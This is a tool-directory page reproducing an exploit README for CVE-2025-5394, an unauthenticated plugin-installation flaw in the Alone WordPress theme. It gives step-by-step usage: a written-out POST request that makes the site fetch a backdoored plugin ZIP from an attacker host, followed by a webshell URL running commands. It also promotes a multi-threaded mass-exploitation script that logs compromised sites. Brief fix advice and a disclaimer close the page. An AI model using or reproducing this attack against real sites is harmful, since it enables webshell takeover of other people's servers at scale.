Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-5394 — Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation | Kitploit
Tools/GitHubGitHub/yucaerin/cve-2025-5394
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation

View Repository
1321 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation

🔥 Vulnerability Summary
The WordPress theme Alone versions <= 7.8.3 is vulnerable to an unauthenticated arbitrary file upload vulnerability. This flaw allows unauthenticated attackers to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint — resulting in remote code execution (RCE) by deploying backdoored plugins.

This vulnerability stems from the beplus_import_pack_install_plugin function exposed to the public via wp_ajax_nopriv_ without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.

🔍 Affected Theme

  • Theme Name: Alone – Charity Multipurpose Non-profit WordPress Theme
  • Affected Version: <= 7.8.3
  • Vulnerability Type: Unauthenticated Arbitrary File Upload → RCE
  • CVE ID: CVE-2025-5394
  • CVSS Score: 9.8 (Critical)
  • Impact: Full remote code execution (RCE) and full site compromise

🧪 Exploit Features

  • 🔓 No authentication required
  • 📦 Uploads malicious plugin ZIP directly from remote URL
  • 🚀 Automatically installs and activates the plugin
  • 🐚 Webshell delivery supported via embedded PHP in plugin
  • ✅ AJAX endpoint accessible by unauthenticated users: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Researcher

  • Credit: Thai An

🚀 Usage

  1. Prepare a malicious plugin ZIP file hosted on a server you control.

    • Must contain a valid plugin header (Plugin Name:) and PHP backdoor (e.g., bk.php)
  2. Craft the following POST request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. If successful, the plugin is installed and activated. Access your shell at:

    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 Mass Exploitation Script This repository includes a mass exploit tool with:

  • Multi-threaded processing
  • Automatic HTTPS prefixing (if missing)
  • Live logging of successful targets to result.txt

See mass_beplus_exploit.py for details.

🛠 Fix Recommendations

  • Theme authors should remove or secure the wp_ajax_nopriv_beplus_import_pack_install_plugin hook.
  • Implement authentication/capability checks (e.g., current_user_can('install_plugins'))
  • Validate and restrict plugin sources.
  • Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.

🔒 Disclaimer:
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.

📚 Reference:

  • Wordfence Advisory – CVE-2025-5394

CVE: CVE-2025-5394
Researcher: Thai An

Download Tool